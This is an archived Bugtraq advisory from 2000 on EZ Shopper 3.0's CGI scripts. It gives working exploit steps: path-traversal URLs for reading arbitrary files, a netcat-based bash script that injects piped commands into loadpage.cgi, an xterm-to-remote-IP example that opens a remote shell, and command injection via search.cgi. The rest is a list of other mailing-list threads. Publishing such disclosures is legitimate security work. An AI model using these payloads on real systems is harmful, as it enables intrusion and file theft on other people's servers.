Bugtraq mailing list archives
EZ Shopper 3.0 shopping cart CGI remote command execution
From: suid () SUID KG (suid () SUID KG)
Date: Sun Feb 27 09:05:41 2000
suid () suid kg - EZ Shopper 3.0 remote command execution. Software: EZ Shopper 3.0 URL: http://www.ahg.com/software.htm#ezshopper Version: Version 3.0 Platforms: Unix, NT Type: CGI, Input validation problem Vendor status: Notified 26/02/2000 Date: 26/02/2000 Summary: Anyone can execute any command on the remote system with the priveleges of the web server. Anyone can read any file on the remote system which the webserver has access to. Vulnerability: The perl code does no input validation and performs an open() on a user supplied input. Exploit: (1) loadpage.cgi - view any file. Firstly using your web browser find the current path (cwd): http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ You will receive an error message like: Cannot open file /home/www/shop/XYZ Now simply use (example based on the above cwd): http://www.example.com/cgi-bin/loadpage.cgi? user_id=1&file=../../<path>/<file> (2) loadpage.cgi - execute any command. This example shell script uses netcat to communicate with a HTTP proxy and exploit the script: ------------------------CUT------------------------ #!/bin/bash echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi? user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080 ------------------------CUT------------------------ A usage example would be: $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display% 20123.123.123.123:0 (3) search.cgi - view files (retarded tho) and execute commands. Simply replace the database field with piped commands or path/filename. http://www.example.com/cgi-bin/search.cgi? user_id=1&database=<insert here>&template=<or insert here>&distinct=1 Note if you use the database field a valid template is probably needed and vice versa. Workaround: The vendor, AHG Inc, has released a fixed version, download it from their website and install the fixed version. Greets: yowie cr active http://www.suid.kg/advisories/010.txt EOF
Current thread:
- Wordpad vulnerability, exploitable also in IE for Win9x Georgi Guninski (Feb 23)
- Re: Wordpad vulnerability, exploitable also in IE for Win9x Kevin Day (Feb 23)
- Re: Wordpad vulnerability, exploitable also in IE for Win9x Scott (Feb 23)
- How the password could be recover using FTP Explorer's registry! Nelson (Feb 24)
- Re: How the password could be recover using FTP Explorer's registry! Seth R Arnold (Feb 25)
- Re: How the password could be recover using FTP Explorer's registry! Rishi Lee Khan (Feb 27)
- Re: How the password could be recover using FTP Explorer's registry! Mikael Olsson (Feb 26)
- Re: How the password could be recover using FTP Explorer's registry! Jeffrey Paul (Feb 28)
- How the password could be recover using FTP Explorer's registry! Nelson (Feb 24)
- lynx - someone is deaf and blind ;) Michal Zalewski (Feb 27)
- EZ Shopper 3.0 shopping cart CGI remote command execution suid () SUID KG (Feb 27)
- Re: EZ Shopper 3.0 shopping cart CGI remote command execution Alex Heiphetz (Feb 28)
- W2K & ~25000+ temp files = crash + corruption? Clifford Hammerschmidt (Feb 28)
- ALERT!: TendMicro InterScan (DOS & intrusion) Veille Technologique (Feb 28)
- Advisory: Foundry Networks ServerIron TCP/IP sequence predictability Andrew van der Stock (Feb 27)
- Re: Zonealarm exports sensitive data Brett Glass (Feb 25)
- Re: Zonealarm exports sensitive data Robert Graham (Feb 28)
- man bugs might lead to root compromise (RH 6.1 and other boxes) Michal Zalewski (Feb 26)